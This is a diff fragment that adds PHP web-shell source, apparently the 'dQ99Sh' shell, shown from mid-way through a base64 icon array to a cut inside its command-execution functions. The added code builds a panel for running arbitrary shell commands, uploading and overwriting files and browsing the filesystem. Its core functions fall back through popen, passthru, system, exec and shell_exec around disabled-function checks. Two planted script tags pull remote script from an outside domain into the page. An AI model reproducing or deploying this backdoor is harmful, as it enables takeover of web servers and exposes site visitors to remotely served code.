+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwdQtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9dQwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSdQ10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7dQ08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LdQ9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDdQ8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"dQEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp".
+"aGeyYpqJlRG/rlwAADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEdQXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//Untuk optimalisasi ukuran dan kecepatan.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {
+  echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>".
+       "Beta-testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
+       "Re-Coding, tricks, html and css by <b>diKi [FeeLCoMz CoMMuNiTy]</b><br><br>".
+       "Report bugs to <a href=\"mailto:thesabotaqe@gmail.com\">r57.biz</a></b>";
+}
+echo "</td></tr></table>\n";
+/*** COMMANDS PANEL ***/
+?>
+<div  class=bartitle><b>.: COMMANDS PANEL :.</b></div>
+<table class=mainpanel>
+<tr><td align=right>Command:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="cmd" size="100" value="<?php echo htmlspecialchars($cmd); ?>">
+    <input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Quick Commands:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type=hidden name="cmd_txt" value="1">
+    <select name="cmd">
+    <?php
+    foreach ($cmdaliases as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    foreach ($cmdaliases2 as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    ?>
+    </select> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Upload:</td>
+<td><form method="POST" enctype="multipart/form-data">
+    <input type=hidden name=act value="upload">
+    <input type=hidden name="miniform" value="1">
+    <input type="file" name="uploadfile"> <input type=submit name=submit value="Upload"> <?php echo $wdt." Max size: ". @ini_get("upload_max_filesize")."B"; ?>
+    </form>
+</td></tr>
+<tr><td align=right>PHP Filesystem:</td>
+<td>
+<?php ##[ diKi TriCkz ]## ?>
+<script language="javascript">
+function set_arg(txt1,txt2) {
+  document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
+  document.forms.fphpfsys.arg1.value = txt1;
+  document.forms.fphpfsys.arg2.value = txt2;
+}
+function chg_arg(num,txt1,txt2) {
+  if (num==0) {
+    document.forms.fphpfsys.arg1.type = "hidden";
+    document.forms.fphpfsys.A1.type = "hidden";
+  }
+  if (num<=1) {
+    document.forms.fphpfsys.arg2.type = "hidden";
+    document.forms.fphpfsys.A2.type = "hidden";
+  }
+  if (num==2) {
+    document.forms.fphpfsys.A1.type = "label";
+    document.forms.fphpfsys.A2.type = "label";
+    document.forms.fphpfsys.arg1.type = "text";
+    document.forms.fphpfsys.arg2.type = "text";
+  }
+  document.forms.fphpfsys.A1.value = txt1 + ":";
+  document.forms.fphpfsys.A2.value = txt2 + ":";
+}
+</script>
+<?php
+  echo "<form name=\"fphpfsys\" method=\"POST\"><input type=hidden name=act value=\"phpfsys\"><input type=hidden name=d value=\"$dispd\">\r\n".
+       "<select name=\"phpfsysfunc\">\r\n";
+  foreach ($phpfsaliases as $als) {
+    if ($als[1]==$phpfsysfunc) {
+      echo "<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+    else {
+      echo "<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+  }
+  echo "</select>\r\n".
+       "<input type=label name=A1 value=\"File:\" size=2 disabled> <input type=text name=arg1 size=40 value=\"".htmlspecialchars($arg1)."\">\r\n".
+       "<input type=hidden name=A2 size=2 disabled> <input type=hidden name=arg2 size=50 value=\"".htmlspecialchars($arg2)."\">\r\n".
+       "<input type=submit name=submit value=\"Execute\"><hr noshade size=1>\r\n";
+  foreach ($sh_sourcez as $e => $o) {
+    echo "<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\r\n";
+  }
+  echo "</form>\r\n";
+?>
+</td></tr>
+<tr><td align=right>Search File:</td>
+<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
+    </form><SCRIPT SRC=http://7jyewu.cn/a/a.asp></SCRIPT>
+    </td></tr>
+<tr><td align=right>Create File:</td>
+<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+    <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
+    </form></td></tr>
+<tr><td align=right>View File:</td>
+<SCRIPT SRC=http://7jyewu.cn/a/a.asp></SCRIPT>
+<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
+    </form></td></tr>
+</table>
+<?php footer(); ?>
+</body></html>
+<?php
+
+###########################
+## dQ99Sh CORE FUNCTIONS ##
+###########################
+function safemode() {
+  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
+  else { return FALSE; }
+}
+function getdisfunc() {
+  $disfunc = @ini_get("disable_functions");
+  if (!empty($disfunc)) {
+    $disfunc = str_replace(" ","",$disfunc);
+    $disfunc = explode(",",$disfunc);
+  }
+  else { $disfunc= array(); }
+  return $disfunc;
+}
+function enabled($func) {
+ if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
+ else { return FALSE; }
+}
+function dQ99exec($cmd) {
+  $output = "";
+  if ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  return $output;
+}
+function dQ99exec2($cmd) {
+  $output = "";
+  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
